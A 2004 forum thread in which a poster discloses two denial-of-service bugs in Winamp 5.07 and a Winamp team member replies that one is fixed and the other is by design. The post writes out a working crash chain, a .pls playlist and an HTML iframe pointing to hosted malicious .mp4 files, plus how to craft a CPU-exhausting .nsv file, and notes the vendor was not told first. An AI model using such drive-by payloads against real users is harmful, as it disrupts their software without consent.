#1
Junior Member
Join Date: Dec 2004
Posts: 4
Winamp 5.07 (latest version) Remote Crash + other stupid shizle
Winamp 5.07 (latest version) Remote Crash.
+ vuln to cause 100% cpu usage.

13/12/04

I. BACKGROUND

Winamp is a very popular Windows audio and video player. It also has a lot of other features and is used by millions of people across the world.

II. DESCRIPTION

VULN 1.

There is a vuln in Winamp's handling of .mp4 and .m4a files, which when exploited can remotely crash the victim's Winamp. The vuln lies in the .mp4 tagging system which Winamp uses. If you use Winamp's built-in feature to edit the tags on .mp4 or .m4a files and insert any data in there, the next time the file is opened it will instantly crash Winamp.

Now how to crash it remotely. If we create a .pls file containing the data

    [playlist]
    numberofentries=5
    File1=http://b0f.pwp.blueyonder.co.uk/a.mp4
    Title1=
    Length5=-1
    Version=2

and make an html page containing an iframe linking to the .pls like

    <html>
    <iframe src="http://b0f.pwp.blueyonder.co.uk/exp2.pls">

now if the victim clicks a link to a page like http://b0f.pwp.blueyonder.co.uk/wexp3.htm it will auto open up the .pls file and load the .mp4 file into Winamp and crash it. This could also be done with .m3u instead of .pls.

VULN 2.

This one is simple: if you create, say, a 1mb file (probably smaller) filled with junk and name it with either the .nsv or .nsa file extension, when opened in Winamp it will cause 100% cpu usage. The bigger the size of the file, the more it will probably slow down the system.

III. ANALYSIS

Vuln 1. Successful exploitation allows remote attackers to crash the victim's Winamp.

Vuln 2. Successful exploitation causes 100% cpu usage.

IV. DETECTION

This has been confirmed in the latest version of Winamp, 5.07, and is probably vuln in earlier versions.

V. WORKAROUND

Don't open suspicious .mp4, .m4a, .nsa or .nsv files or click untrusted links.

VI. VENDOR

The vendor has not been contacted. Why bother? one asks.

VII. CREDIT

Alan M aka b0f (b0fnet at yahoo.com)

P.S. Buy Tupac - Loyal to the Game, out 14/12/04
#2
Techorator
Winamp & Shoutcast Team
Join Date: Jun 2000
Posts: 35,983
The in_mp4 issue is fixed for the next release. Thanks.
in_nsv behaves as you described by design....

Quote: "The nsv issue, while it's annoying, it's the exact behavior we want. NSV is a bitstream and we search through a file looking for the NSV markers. If we don't find one, we can't play. This can cause high cpu load for a short amount of time."